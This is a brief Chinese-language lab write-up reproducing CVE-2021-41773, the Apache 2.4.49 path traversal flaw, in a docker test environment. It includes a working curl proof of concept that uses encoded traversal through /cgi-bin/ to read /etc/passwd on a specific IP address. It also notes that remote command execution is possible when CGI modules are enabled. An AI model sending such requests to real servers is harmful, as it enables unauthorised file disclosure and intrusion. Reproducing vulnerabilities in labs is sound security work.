CVE-2021-41773
该漏洞是由于Apache HTTP Server 2.4.49版本存在目录穿越漏洞,在路径穿越目录
<Directory/>Require all granted</Directory>允许被访问的的情况下(默认开启),攻击者可利用该路径穿越漏洞读取到Web目录之外的其他文件在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意cgi命令(RCE)
拉取环境 docker pull blueteamsteve/cve-2021-41773:no-cgid
启动环境 docker run -d -p 8082:80 97308de4753d
1.开启环境,访问页面
2. 使用poc 
curl http://116.62.119.171:8082/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
3.利用工具验证
4. 在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意cg命令
